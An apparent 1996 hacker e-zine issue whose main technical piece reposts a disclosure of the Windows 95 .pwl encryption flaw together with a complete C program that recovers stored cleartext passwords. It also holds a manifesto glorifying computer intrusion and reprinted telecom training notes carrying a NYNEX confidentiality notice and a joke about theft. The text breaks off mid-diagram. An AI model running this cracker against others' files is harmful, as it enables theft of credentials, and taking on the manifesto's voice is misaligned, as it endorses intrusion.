Copy Link
Add to Bookmark
Report
Hackers Issue 05
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #5, January, 1996
Edited by: Revolution
-------------------
Hackers Forums
-------------------
From the editor . . . . . . . . . . . . . . . . . . . . . . . . Revolution
-------------------
Technology
-------------------
Windows.pwl cracked . . . . . . . . . . . . . . . . . . . . . .Tatu Ylonen
The X Files, Issue 0 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo
The X Files, Issue 1 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo
The X Files, Issue 2 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo
The X Files, Issue 3 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo
The X Files, Issue 4 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo
The X Files, Issue 5 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo
The X Files, Issue 6 . . . . . . . . . . . . . . . . . . . . . .Erik Turbo
Secure Shell Faq . . . . . . . . . . . . . . . . . . . . . . Thomas Koenig
--------------------
Politics
--------------------
CuD #7.01 . . . . . . . . . . . . . . . . . . . . . . . . . CuD Moderators
The End . . . . . . . . . . . . . . . . . . . . . . . . . . . . Revolution
----------------------------------------------------------------------------
copyright 1996 by Mike Scanlon All articles remain the property of their
authors, and may be reprinted with their permission. This zine may be
reprinted freely as a whole electronically, for hard copy rights mail the
editor. HACKERS is published by Mike Scanlon, to be added to the
subscription list or to submit articles mail mrs3691@hertz.njit.edu
-----------------------------------------------------------------------------
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #5, File #1 of 12
From the Editor
For the first time in its short career, Hackers has already had
problems going out on time. Of course, I can blame nobody but myself, seeing
as I am the only one working on this zine, so, I apologize. From now on I
will try to get out whatever I have, however skimpy it might be, on the first
weekend of each month.
The Virus and Bug of the month author positions are still wide open,
if anybody is interested, mail mrs3691@hertz.njit.edu, which is now the
official email address of the zine. Anyone else working in computer security,
as a hobbyist or professional, please don't be afraid to send articles in. I
would like to run the letters column monthly, but of course I can't do that
without reader input, so if you have any questions, flames, anything, you know
where to send them.
I was promised a few articles that never ended up getting in, so this
issue is mostly full of reprinted material (the X files), although it is
material worth reprinting. I included CuD 7.01, because it details the recent
compuserve fiasco, which I think everybody should be aware of, as it affects
all of us in the long run, being the first time censorship has occured on such
a large scale in the realm of cyberspace.
Anyway, enjoy!
..- Revolution
* * * * * * * * * * * * * * * * * * * *
As always, the standard disclaimer applies. All of these articles are
provided for informational purposes only, Mike Scanlon and the respective
authors cannot be held accountable for any illegal acts they are used to
commit.
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #5, File #2 of 12
Windows.pwl cracked
Tatu Ylonen
[This post was originally discovered while reading through some bugtraq posts
the credit should really be given to Frank Andrew Stevenson for the crack.
..-Revolution]
Date: Mon, 4 Dec 1995 19:06:12 +0100
From: Tatu Ylonen <ylo@cs.hut.fi>
To: ssh@clinet.fi
Subject: FWD from Frank Andrew Stevenson: Cracked: WINDOWS.PWL
I am sorry to send noise to the list; this deals with Windows95 but is
quite relevant to many Unix administrators as well. This is not
related to ssh. The ssh list is not intended for this kind of stuff,
so please don't do what I am doing now.
Basically, you should be aware that if you ever mount disks from Unix
machines to Windows95 machines, the passwords of the unix machine (or
your other file servers) will be stored on the Windows machine's disk
essentially in the plain, and any 10-year computer-literate kid with a
little knowledge will be able to retrieve them in seconds if he gets
access to client machine.
The message below explains the details. Essentially it means that
the whole encryption scheme used by Microsoft in Windows95 is a Bad
Joke. Not only does it use too short keys (breakable by brute force
in 8 hours on a normal workstation), but additionally it screws up the
implementation, meaning that your keys can be trivially decrypted
in a fraction of a second without ever even brute-forcing the key.
The program to do this is below.
I find this kind of "security" shocking. I think this should go to
the mass media. At least make people at your sites aware of this
fiasco.
Tatu
------- start of forwarded message (RFC 934 encapsulation) -------
From: Frank Andrew Stevenson <frank@funcom.no>
To: cypherpunks@toad.com
Subject: Cracked: WINDOWS.PWL
Date: Mon, 4 Dec 1995 17:51:36 +0100 (MET)
A few days ago Peter Gutmann posted a description on how
Windows 95 produces RC4 keys of 32 bits size to protect
the .pwl files. I verified the information and wrote a
program to decrypt .pwl files with a known password, I then
discovered that the .pwl files where well suited for a known
plaintext attack as the 20 first bytes are completely predictable.
The 20 first bytes of any .pwl files contains the username, which
is the same as the filename, in capitals, padded with 0x00. From then
I wrote a program to bruteforce the .pwl file and optimized it
so it would run in less than 24 hours on an SGI. I run a test
of the bruter software and recovered an unknown rc4 key in 8 hours,
but the decrypted file was still largely uninteligeble, I then proceeded
to decrypt the file at all possible starting points, and discovered
valuable information (cleartext passwords) offset in the file.
This has enormous implications: RC4 is a stream cipher, it
generates a long pseudo random stream that it uses to XOR the
data byte by byte. This isn't neccecaraly weak encryption if you
don't use the same stream twice: however WIN95 does, every resource is
XORed with the same pseudo random stream. What's more the 20
first bytes are easy to guess. This is easy to exploit:
XOR the 20 bytes starting at position 0x208 with the user name
in uppercase, and slide this string through the rest of the file
(xoring it with whatever is there) this reveals the 20
first bytes of the different resources.
>From there I went on to study the structure of the .pwl file it is
something like this (decrypted):
USERNAME .wpwpwpwpwpwpwpwpwpwp
rs???????
rs
rs
rs???????????
rs???????
where wp is i word pointer to the different resources (from start
of pwl file) The 2 first bytes of the resource (rs) is its length in bytes
(of course XOR with RC4 output) It is the fairly easy to find all the
resource pointers by jumping from start of resource to next resource,
had it not been for the fact that the size sometimes is incorrect
(courtesy of M$)
What follows is a short c program that tries to remedy this and
reconstruct the pointertable thus generating at least 54 bytes of the RC4
pseudorandom stream, and then proceedes to decrypt as much as possible from
the different resources.
What does this show? Although RC4 is a fairly strong cipher, it has the
same limitations as any XOR streamcipher, and implementing it without
sufficient knowledge can have dire consequences. I strongly suggest that
the programmers at Microsoft do their homework before trying anything like
this again!
DISCLAIMER:
This is a quick hack, I don't make any claims about usefulness for
any purpose, nor do I take responsibility for use nor consequences of
use of the software. FUNCOM of Norway is not responsible for any of this,
(I speak for myself, and let others speak for themselves)
This source is hereby placed in the public domain, please
improve if you can.
- --- glide.c ---
#include <stdio.h>
#include <string.h>
unsigned char Data[100001];
unsigned char keystream[1001];
int Rpoint[300];
main (int argc,char *argv[]) {
FILE *fd;
int i,j,k;
int size;
char ch;
char *name;
int cracked;
int sizemask;
int maxr;
int rsz;
int pos;
int Rall[300]; /* resource allocation table */
if (argc<2) {
printf("usage: glide filename (username)");
exit(1);
}
/* read PWL file */
fd=fopen(argv[1],"rb");
if(fd==NULL) {
printf("can't open file %s",argv[2]);
exit(1);
}
size=0;
while(!feof(fd)) {
Data[size++]=fgetc(fd);
}
size--;
fclose(fd);
/* find username */
name=argv[1];
if(argc>2) name=argv[2];
printf("Username: %s\n",name);
/* copy encrypted text into keystream */
cracked=size-0x0208;
if(cracked<0) cracked=0;
if(cracked>1000) cracked=1000;
memcpy(keystream,Data+0x208,cracked );
/* generate 20 bytes of keystream */
for(i=0;i<20;i++) {
ch=toupper(name[i]);
if(ch==0) break;
if(ch=='.') break;
keystream[i]^=ch;
};
cracked=20;
/* find allocated resources */
sizemask=keystream[0]+(keystream[1]<<8);
printf("Sizemask: %04X\n",sizemask);
for(i=0;i<256;i++) Rall[i]=0;
maxr=0;
for(i=0x108;i<0x208;i++) {
if(Data[i]!=0xff) {
Rall[Data[i]]++;
if (Data[i]>maxr) maxr=Data[i];
}
}
maxr=(((maxr/16)+1)*16); /* resource pointer table size
appears to be
divisible by 16 */
/* search after resources */
Rpoint[0]=0x0208+2*maxr+20+2; /* first resource */
for(i=0;i<maxr;i++) {
/* find size of current resource */
pos=Rpoint[i];
rsz=Data[pos]+(Data[pos+1]<<8);
rsz^=sizemask;
printf("Analyzing block with size:
%04x\t(%d:%d)\n",rsz,i,Rall[i]);
if( (Rall[i]==0) && (rsz!=0) ) {
printf("unused resource has nonzero size !!!\n");
exit(0);
}
pos+=rsz;
/* Resources have a tendency to have the wrong size for
some reason */
/* check for correct size */
if(i<maxr-1) {
while(Data[pos+3]!=keystream[1]) {
printf(":(%02x)",Data[pos+3]);
pos+=2; /* very rude may fail */
}
}
pos+=2; /* include pointer in size */
Rpoint[i+1]=pos;
}
Rpoint[maxr]=size;
/* insert Table data into keystream */
for(i=0;i <= maxr;i++) {
keystream[20+2*i]^=Rpoint[i] & 0x00ff;
keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff;
}
cracked+=maxr*2+2;
printf("%d bytes of keystream recovered\n",cracked);
/* decrypt resources */
for(i=0;i < maxr;i++) {
rsz=Rpoint[i+1]-Rpoint[i];
if (rsz>cracked) rsz=cracked;
printf("Resource[%d] (%d)\n",i,rsz);
for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);
printf("\n");
}
exit(0);
}
- --- end ---
#include <std/disclaimer.h>
E3D2BCADBEF8C82F A5891D2B6730EA1B PGPencrypted mail preferred, finger for key
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #5, File #3 of 12
__
\ / |_
/ \ e n o n | o u n d a t i o n
presents:
\ /
*------ the \ /
/ \ files ------*
/ \
Issue: 0
Feb/1994
Introduction By: Erik Turbo
"Yes, we are the men in black hats, taking advantage of your stupidity to
gain information and knowledge about the world around us, while the man on
the corner is selling drugs to your children. While rapists, child
molesters, murders, and common thieves are taking advantage of the justice
system, we are protecting what we believe in; the freedom to learn. You
claim we invade other's privacy, while you are in the process of creating
universal encryption standards that you can easily dicipher. You claim we
are the villains of the information age, as you assasinate another
president, cover up more information, and make shady deals with yet another
foreign leader.
Let me inform you of the ongoing state of mind, the attitude, the power, that
is the Xenon Foundation. We are a handful of collective intelligence, of
revolutionaries, if you will, who have combined forces to fight the horrid
system of oppression we call the government. First of all, we have been, and
always shall be first and foremost, computer intruders. Hackers, crackers,
thieves, criminals, call us what you will, but we are not any of those. We
are crusaders, on a relentless mission to gather as much information and
knowledge as humanly possible, using the most powerful medium known to man -
the computer - to aid us. Combine that medium with that of the telephone
network and you've got an endless stream of data - of information - flowing
directly through your computer, into your brain, into your soul. Feed your
brain with what your consciousness craves. Liberate yourself, my friend, and
take the plunge into the electronic sea of digital data. Unearth the mass
of 1's and 0's that have been intentionally covered up by the vile powers
that be, to protect us."
Welcome to "the-X-files." At last, from the guild of secrets, the Ring of
Five, and out of the confines of secrecy, are the Xenon Foundation's most
sacred works, including some of the most extensive technical volumes that
have ever been combined into any series of digital text.
To recieve the-X-files via Internet mail, contact:
xfiles@bic.ponyx.com
To submit an article for publication as an X file, mail:
submit@bic.ponyx.com
All other mail to the Xenon Foundation should be submitted to:
xenon@bic.ponyx.com
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #5, File #4 of 12
__
\ / |_
/ \ e n o n | o u n d a t i o n
presents:
\ /
*------ the \ /
/ \ files ------*
/ \
Fall/1993 Issue: 1
INTRODUCTION TO BASIC DIGITAL TECHNOLOGY
Written by: Erik Turbo
File: 1 of 6
1. Analog to Digital Conversion
1.1 Introduction
Data communication is simply sending information from one location to
another by coded signals. There are three minimum components all
communincations systems have regardless of how complex or simple the
system is. Those three components are:
1. a transmitter
2. a receiver
3. a transmission path between the transmitter and receiver
Information is sent over communication systems from one location to another
via data signals. There are two basic types of signals:
> Analog
> Digital
On the next few pages you will read about analog and digital technology.
Analog technology is used by customers that do not require sending infor-
mation at high speed. Currently Analog services are cheaper than digital
services but this will not always be the case. Analog technology does
not offer the reproduction quality nor the vast services which are offered
with digital technology instead of analog. Digital technology has only
become available in the 80's.
1.2 Overall Configuration And Digital Concepts
Central Office 1 Central Office 2
_______________ ________________
| D4 | | D4 |
| _____ | | _____ | __________
| | |=====|=====================| | | | | |
| | FXO | | | | FXS | |====== | TELPHONE |
| | | | | | | | |__________|
| |_____|=====|=====================| |_____| |
| | | |
|_______________| |________________|
The FX Circuit configuration above contains groups of components that
comprise most Special Service Circuits. These components include the
following:
> Switching Equipment
> Facilities:
- Exchange
- Interoffice
> Facility Terminal Equipment
> All three component groups exist in either an Analog or Digital environment
1.3 Analog Signal Characteristics
An Analog signal is a continously varying voltage and current quantity
representing the human voice. The amplitude represents the loudness and
the number of cycles per second represents the voice frequency:
Characteristics of the Analog signal are:
1. The signal is continuous in time.
2. All values are permitted in the positive maximum limits defined.
3. In Analog transmission systems, the sound being transmitted is represented
by the shape of the Analog signal.
1.4 Analog Signal Generation
__________________
| |
\ | | /
\ | | /
| | VARIABLE | |
SOUND --> |======| RESISTOR |=====| ----> REPRODUCED
WAVE | | | | SOUND
/ | | \ WAVE
1 / 2 | 3 | 4 \
------------------
Analog Signal Generation
The generation of an Analog signal takes the following steps:
1. When a person speaks into the transmitter of a telephone set, changes in
the air pressure, sound waves, and sensed by the diaphragm (2)
2. The diaphragm repsonds to changing air pressure and changes circuit resit-
ance by compressing carbon in the transmitter.
3. The change in resistance causes current flow to fluctuate, creating an
electrical wave analogous to the sound wave.
4. Fluctuating current flows through the coil and vibrates the receiver
diaphragm, which reproduces the sound wave.
AN ANALOG SIGNAL IS A CONTINOUSLY VARYING REPRESENTATION OF A SOUND WAVE.
1.5 Analog Waves - Components
An Analog signal is composed of amplitude and frequency. These components
define the sound wave an Analog signal represents.
The amplitude and frequency are two characterisitcs of the analog signal that
can be varied to convey information.
Amplitude is the measure of the volume or loudness of the Analog signal.
Amplitude is the relative strength of the signal.
Frequency is the number of cycles in a unit of time.
1.6 Frequency
Frequency is related to the pitch of a sound. Frequency is measured in
Hertz (Hz) - The number of cycles or oscillations per second.
Frequency and amplitude relationships:
1. Low frequency, low amplitude - whispering at a low pitch.
2. Low frequency, high amplitude - yelling at a low pitch.
3. High frequency, low amplitude - whispering in a high pitch.
4. High frequency, high amplitude - yelling at a high pitch.
1.7 Analog Signal Impairments
> Loss - Attenuation
> Noise - Unwanted Electrical Signals
> Distortion - Frequency Characteristic Changes
Attenuation (Loss) and Amplification.
The ideal transmission channel will deliver an accurate replica of the
original signal to the receiving terminal. Three major problems affect
the transmission of Analog signals:
1. LOSS - Weakening of the signal
2. NOISE - Unwanted electrical signals that interfere with the information
signal.
3. DISTORTION - Changing of the frequency characteristics of the signal.
1.8 Analog Signal Attenuation and Amplificiation
> The signal is continuously attenuated, or weakened, as it progresses along
the transmission medium.
> The signal is then amplified at intervals to compensate for the attenuation.
> Line loss can be overcome by properly spacing amplifiers in the circuit.
1.9 Amplifying Distorted Signals
> The Analog signal is also affected by noise and distortion.
> Analog signals pick up noise as they travel through the network.
> Noise and distortion change the shape of the Analog signal.
> Amplifiers are designed to reproduce all of the variation of the Analog
signal, the amplifier cannot distinguish between the voice, noise, and
distortion components of the Analog signal.
> The amplifier amplifies the entire input signal, thus the noise is
amplified along with the original signal.
> As the signal path increases in length and more amplification is needed,
more noise is introduced.
> The effects of noise and distortion is cumulative along the Analog trans-
mission system.
1.10 Analog Signal Disadvantage
> The major disadvantage of Analog transmission systems is the cumulative
nature of transmission impairments.
> Loss can be overcome by amplification to increase the sigmnal to its
original value. Noise is also amplified.
> Once introduced, the effects of noise and distortion cannot be eliminated.
> Digital transmission systems solve the "Analog Problem."
1.11 Digital Transmission Concepts
Digital Signal Definition
A Digital signal is a discontinuous signal in the form of pulses. Good
examples would be flashes of light, telegraph clicks, and dialing pulses.
A transmitted Digital signal generally represents a series of on/off
pulses, transmitted at a steady rate and amplitude.
1.12 Digital Signal Regeneration
Digital transmission systems solve the basic "Analog Problem" of cumulative
effects of noise and distoriton by regenerating rather than amplifying the
transmitted signal.
The regenerative repeater detects the presence of a pulse, (signal), and
creates a new pulse, (signal), based on a sample of the existing signal.
The regenerated signal duplicates exactly the signal originally transmitted.
This eliminates the cumulative effects of noise and distortion inherent
in Analog facilities. Distortion is not amplified as it is an Analog signal,
it is omitted when the signal is regerated.
1.13 Comparison of Analog and Digital Signals
The Analog signal is a signal that varies in a continuous manner over a
wide range of amplitude and time. As you know, in Analog transmission,
amplifiers were used to boost the strenght of the signal. With Analog
signal transmission, the line noise is amplified along with the signal
at each repeater point. Thus, as the distance increases, so does the
distortion.
The Digital signal is a series of pulses, all having a specified amplitude
and duration in time. A Digital signal has only a discrete number of states,
0 or 1. This on/off state simplifies the process of detecing and regerating
the digital bit stream.
Instead of amplifying the signal, a rengenerator produces a fresh signal
based on a sample of the existing signal. By using this method, noise does
not accumulate. At each repeater location, the incoming Ditital signal
is regenerated into the correct 0 or 1 signal. While the associated line
noise is ignored.
1.14 Analog to Digital Conversion - Overview
.. 1 1 0 1 0 1 1
/\ ______ __________ ________ _ _ _ _ _
/ \ /==| | | | | | | | | | | | | | | |
\/ |SAMPLE|==| QUANTIZE |===| ENCODE |_| |_| |___| |___| |_| |__
ANALOG |______| |__________| |________|
SIGNAL
Analog to Digital Conversion
Converting an Analog signal to a Digital signal requires the steps of
sampling, quanitizing, and encoding.
> Sampling
In the sampling process, portions of a signal are used to represent the
whole signal. Each time the signal is sampled, a Pulse Amplitude
Modulation (PAM) signal is generated. In order to accurately reproduce
the Analog signal (speech), a sampling rate of at least twice the
highest frequency to be reproduced is required. Because a majority of
voice frequencies are less than 4 KHz, and 8 KHz sampling rate has
been established as the standard.
> Quantizing
In order to obtain the Digital signal, the Pulse Amplitude Modulation (PAM)
signal is measured and coded. The amplitude or height of the PAM is
measured to derive a number that represents its amplitude level.
> Encoding
The decimal (Base 10) number derived in the quanitizing step is then
converted to its equivalent 8 bit binary number. The output is an 8
bit "word" in which each bit may be either a "1" (pulse) or a "0" (no
pulse)
This process is repeated 8,000 times a second for a telephone voice
channel service.
1.15 Filtering
The range of frequencies in the human voice approximates 50 Hz to 20,000 Hz.
Telephone transmission systems are arranged to transmit Analog signals
between 200 Hz and 4,000 Hz. Extreme frequencies below 200 Hz and above
4,000 Hz are removed by a process called Filtering.
1.16 Sampling
The sampler measures the filtered Analog signal 8,000 times a second, or
once ever 125 microsecons (u sec.) The value of each of these samples is
directly proportional to the amplititude of the Analog signal at the time
of the sample.
The sampling process is called Pulse Amplitude Modulation (PAM)
1.17 Quantizing
Quantizing is essentially matching the PAM signals to one of the 255 numbers
on a segmented scale. The quantizer measures the amplitude or height of
each PAM signal coming from the sampler and assigns it a value from
-127 to plus 127.
1.18 Pulse Code Modulation (PCM) Encoding
Encoding involves the conversion of the number that was determined in the
quantizing step, to a binary number. each quantized PAM signal is conerted
ito an 8-bit binary "word" in which each bit may be either a "1" (pulse)
or a "0" (no pulse). The 8-bit "word" represents the binary equivalent
of the number from the quantizing step.
1.19 PCM Encoding Example
If the Pulse Amplitude Modualation (PAM) signal measures +45 on the
quantizing scale, the output of the encoding step is the 8-bit word
"10101101" (ie: the binary equivalent of +45.)
1.20 Digital to Analog Conversion
At the receiving terminal the following occurs:
> The Digital pulses are converted back to the original Analog signal.
> The Pulse Code Modulation (PCM) signals are decoded to the Pulse Amplitude
Modulation (PAM) signals they represent.
> The succession of PAM signals are passed through a filter, thereby
reconstructing the orignal analog wave form.
1.21 Conclusion
Some customers are still using analog technology for services like FX lines,
POT lines, WATTS lines and voice services. These customers feel they don't
need the high speed of the quality of digital services. Currently the
Analog services are cheaper than the Digital services, although this could
change.
In our fast paced environment many customners want higher speed communications
with top quality. Digital technology provides this and allows our customers
to send data and voice communications simulataneously. Our jobs will be
influenced greatly by the new services our customers want, which only
digital technology can provide. You will learn about the services which
only digital technology can offer later on in this manual.
NOTICE
Not for use or disclosure outside the NYNEX Corporation
or any of its subsidiaries except when rightfully stolen.
------------------------------------------------------------------------------
EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF
------------------------------------------------------------------------------
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #5, File #5 of 12
__
\ / |_
/ \ e n o n | o u n d a t i o n
presents:
\ /
*------ the \ /
/ \ files -----*
/ \
Fall/1993 Issue: 2
INTRODUCTION TO BASIC DIGITAL TECHNOLOGY
Written by: Erik Turbo
File: 2 of 6
2. Time Division Multiplexing (TDM)
2.1 Defining Multiplexing
Multiplexing basically combines or merges a number of signals into one
composite signal. The most common type of multiplexer at NET is called
a TIME DIVISION MULTIPLEXER.
Time Division Multiplexing
In the telephone industry, the D Channel Bank Time Division Multiplexer
is the type most commonly used and the one you will probably use.
The D Channel Bank Time Division Mutliplexer works by taking twenty four
(24) voice channels and time division multiplexing them at the near end
terminal. Then the signals are sent over a pair of wires to the far
end terminal.
This smae process is occuring at the far end terminal. The signal from the
far end terminal is sent over another pair of wires to the near end terminal.
Each terminal is equipped to restore the signal recieved to its orignal
form.
Time Division Multiplexing is used to take low speed information, sample
it, and then send this information over a high speed data line. Each
time all twenty four (24) channels have been sampled and sent, a framing
signal is sent. This framing signal aids the far end terminal in identying
and reassembling all of the information for each channel. This process is
known as synchronizing data.
On the next page you will learn how the sampled signals are quantized and
encoded by a process called Pulse Code Modulation (PCM) before they are
transmitted via Time Division Multiplexing to a distant terminal.
2.2 Multiplexing--Pulse Code Modulation (PCM)
> At 8,000 samples per second, a single channel is sampled once per 125
micro-seconds. Each sample uses 5.2 microseconds of time.
> There are approximately 120 microseconds of idle time between each sample
on a single channel Pulse Code Modulation (PCM) facility.
> To make efficient use of the facility, many samples are sent on the same
path, which is called multiplexing.
2.3 Pulse Code Modulation (PCM) Frame
A Frame requires 125 microseconds to transmit and contains once encoded
sample (8-bit word) for each channel that is multiplexed, plus the framing
bit.
The Frame is sub-divided into Time Slots. A Time Slot represents the time
required the send one 8-bit word.
The basic Pulse Code Modulation (PCM) bit stream contains 1,544,000 bits/sec.
2.4 DS1 Bit Rate Computation
24 CHANNELS
x 8 BITS/WORD
192 BIT
+ 1 FRAMING BIT
193 BITS/FRAME
X 8000 TIMES/SEC
1544000 BITS/SEC
OR
1.544 M BITS/SEC
2.5 Time Division Multiplex (TDM)
> This diagram shows the overall digital transmission system.
> The Analog signal is sampled 8000 times a second via a process called
Pulse Amplitude Modulation (PAM). The Pulse Amplitude Modulation (PAM)
sample represents the amplitude of the signal at the time of sampling.
> Each Pulse Amplitude Modulation (PAM) sample is quanitzed and encoded
to an 8-bit Digital signal via a process called Pulse Code Modulation
(PCM).
> The Pulse Code Modulation (PCM) samples from all 24 channels are combined
via a process called Time Division Multiplexing and transmitted to a
distant terminal over a common path.
> At the distant terminal, the Pulse Code Modulation (PCM) samples are
decoded, demultiplexed and filtered to reconstruct the orignal Analog
waveform.
2.6 Conclusion
Multiplexing is vital to our business because it allows us to take advanage
of the idle time between each signle channel Pulse Code Modulation (PCM)
facility. The idle time is used efficiently via multiplexing which allows
us to send many samples on the same path.
So multiplexing maximizes efficient use of the facility and reduces idle
time by sending numerous samples over the same path.
NOTICE
Not for use or disclosure outside the NYNEX Corporation
or any of its subsidiaries except when rightfully stolen.
------------------------------------------------------------------------------
EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF
------------------------------------------------------------------------------
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #5, File #6 of 12
__
\ / |_
/ \ e n o n | o u n d a t i o n
presents:
\ /
*------ the \ /
/ \ files ------*
/ \
Fall/1993 Issue: 3
INTRODUCTION TO BASIC DIGITAL TECHNOLOGY
Written by: Erik Turbo
File: 3 of 6
3. Channel Banks
3.1 Introduction
In this next section you will learn about a typical digital facility. Most
digital facilities contain:
> Channel Banks
> A Transmission System
You will learn about the channel banks and a typical transmission system
which includes:
> Loop Plant
- Loop Cables
- Impairments
- Digital Loop Carrier (DLC)
- SCL 96--Modem 3
3.2 Digital Channel Banks
> The function of the digital facility is to provide 24 Voice Frequency (VF)
channels from one point to another over a PCM transmission system. The
most basic type of digital facility consists of two elements:
1. Channel Banks (or terminals)
2. A Transmission System
> The channel banks provide the A/D interface between 24 VF circuits and a
digital Pulse Code Modulation (PCM) transmission system. The digital
transmission signal between two channel banks.
3.3 Loop Plant
The loop plant is the connect between the telephone customer and the serving
Central Office. Most loops are quite short, the median length is about
1.7 miles.
1. Loop Cables
The loop plant gernerally consists of metallic cable pairs. Typical
cable gauges are the 19, 22, 24, or 26 gauge. The higher the gauge
number, the smaller the wire diameter and the more resistance per foot.
CABLE GAUGE OHMS/KFT
-------------------------------------------------------
26 83.2
24 51.9
22 32.8
19 16.3
2. Impairments
As the distance from the Central Office increases, so does transmission
loss. Switching systems and telephone equipment are designed to oper-
ate at specified limits, therefore, the loop plant is generally limited
without treatment from 1,300 to 1,500 ohms. In addition the resistance,
another factor that impacts transmission is loop capacitance.
3. Digital Loop Carrier (DLC)
The loop capacitance results in greater loss at the higher frequencies.
To care for this, loop cable over 18 Kft are equipped with load coils.
New loop cable configurations, longer than 24 Kft, generally used
Digital Loop Carrer (DLC) such as SLC 96.
3.4 Digital Loop Carrier (DLC)
Digital Loop Carrier (DLC) systems are being installed in significant
numbers, about 50,000 DS1 lines per year, to provide new services and
reduce cost. The systems in use include AT&T SLC 96 system, Norther
TELECOM's DMS-1 Urban, and systems from other vendors.
The SLC 96 system is a digital subscriber carrier system which provides
up to 96 subscriber lines. It provides residential, coin, and special
services. SLC 96 operates in three modes with Mode 3 used for special
service including Digital Data Services (DDS) dataport.
This SLC 96 layout is similar to Mode 1 and Mode 2 having a Central
Office (CO) and Remote Terminal (RT). The major difference is that the
channels are reduced from 24 to 12 for each bank. D4 Channel units can
be used in the SLC 96 Mode 3 arrangement
The Mode 3 arrangement has two T1 (DS1) lines plus one T1 for protection
in case of a line problem on either of the service lines.
------------------------------------------------------------------------------
EOF ---------------- Xenon Foundation Productions 1993 -------------------EOF
------------------------------------------------------------------------------
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #5, File #7 of 12
__
\ / |_
/ \ e n o n | o u n d a t i o n
presents:
\ /
*------ the \ /
/ \ files ------*
/ \
Fall/1993 Issue: 4
INTRODUCTION TO BASIC DIGITAL TECHNOLOGY
Written by: Erik Turbo
File: 4 of 6
4. Digital Transmission
4.1 Interoffice Facilities
Below is a list of interoffice facilities required for digital transmission
of data.
1. VF Facilities
A small number of Special Services circuits use VF, Voice Frequency, pairs
for the facility between Central Offices.
a. MFT Equipment
The Metallic Facility Terminal (MFT) is the AT&T family of plug-in
equipment developed to provide transmission and/or signaling fuctions
required for metallic facilities. MFT provides the interfect between
VF metallic circuits and switching systmes, station equipment, or
another metallic cable.
In addition to metallic facilities, micro-wave radio is utilized for both
digital and analog transmission. Fiber-optic facilites are also utilized
for digital transmission.
2. Carrier Facilities
Carrier facilities, both analog and digital, are pair gain devices. They
are more economic than using Voice Frequency (VF) metallic cable pairs.
3. Digital Transmission Systems
a. Digital Hierarchy
Digital terminals are connected together by an almost countless number
of facility and equipment configurations.
b. Digital Channel Banks
The most common channel banks used by the BOCs are the AT&T D4 and D5
terminals. The channel units provide transmission and signalling
features required to interface with 2 or 4 wire circuits.
4.2 T1 Carrier Line
The T1 line carries DS1 signals (1.544 Mb/s) between signal digroup channel
banks using four-wire bidirectional transmission over standard cable
pairs.
4.3 Digital Line Coding
> Bipolar Coding
Bipolar coding is the basic line coding procedure used by T-carrier lines.
A Bipolar code uses alternating polarties for encoding "1"'s.
> Clear Channel Capability
Clear Channel Capability is used to describe the capability to transmit
a DSO or DS1 level signal which contains any mix of ones and zeros,
including all zeros. The density requirement is no more than 15 zeros.
If more than 15 zeros are used then ones must be put in or an error
will result.
Due to current signaling and maintenance requirements, only 56 kbps of
the DSO signal is available for use by the customer.
In order to provide 64 kbps Clear Channel Capability (64 CCC), the Bipolar
with Eight Zero Substitution (B8ZS), is the method recommended as the North
American Standard. However, interim methods such as Fractionally Controlled
Mutliplexing (FCM), or Zero Byte Time Slot Interchange (ZBTSI), can be
utilized as an expedient.
> Bipolar Advantages
- Simplifies error detection
- Elimates DC components
- Reduces bandwith requirements
4.4 Digital Wave Forms
0 1 1 0 0 1 0 1
+V ----------- ----- -----
| | | | | |
0V _____|___________|__________|_____|______|_____|_
-V
Unipolar Non-return to zero
0 1 1 0 0 1 0 1
+V ---- ---- ----- -----
| | | | | | | |
0V _____|____|_|____|__________|_____|______|_____|_
-V
Unipolar Return to Zero
0 1 1 0 0 1 0 1
+V ---- -----
| | | |
0V _____|____|_________________|_____|______________
| | | |
-V |_____| |_____|
Bipolar non Return to Zero
0 1 1 0 0 1 0 1
+V ____ ____
| | | |
0V _____|____|_________________|____|______________
| | | |
-V |____| |____|
Bipolar Return to Zero
Comparison of Digital Waveforms
4.5 Error Detection
+ ____ ____ ____
| | | | | |
0 ____| |________ ____| |__________ ___| |________
| | | |
- |____| |____|
.. /\ < -- Noise Burst
+ _____/\_______________________________________/____\___________________
/ \ / \ /\ /\ / \ __ / \
0 _/________\____/____ \____/____\/____\____/____________\/__\____/_____\
\/ \/ \/ \/ \
- _______________________________________________________________________
Bi-Polar Violation
. |
. |
+ ____ ____ ____ ____
| | | | | | | |
0 ____| |________ ____| |___| |_ ___| |________
| | | |
- |____| |____|
Error Detection
The error detection technique is very simple. Since each successive "1" bit
is of opposite polarity, and extra pulse will show up as an error. This
error detection technique is called Bipolar Violation Detection.
4.6 Analog Switching with Digital Transmission
__________ 1 001010 2 _______ 3
_________ | Local | __ __ |Toll | __
|Telephone|----|-x--x--x--|------|__|----------|__|------|-x-x-x-|---|__|-.
--------- | Office | |Office | |0
|__________| |_______| |0
Analog - Digital |1
Conversion |0
|1
|0
__________ 6 5 _______ 4 |
_________ | Local | __ 001010 __ |Toll | __ |
|Telephone|----|-x--x--x--|------|__|----------|__|------|-x-x-x-|---|__|-.
--------- | Office | |Office |
|__________| |_______|
Key:
1,2,3,4,5 and 6 are Analog/Digital Conversion switching systems
001010 is the digital bit-stream representation of the analog signal
Analog Switching with Digital Transmission diagram
The diagram shows an Analog signal being converted to Digital for transmission
and back to Analog for switching. This configuration causes additional
noise and distortion to be added to the Analog signal.
Toll Office
__________ 1 ________
_________ | Local | __ 01101110 | |
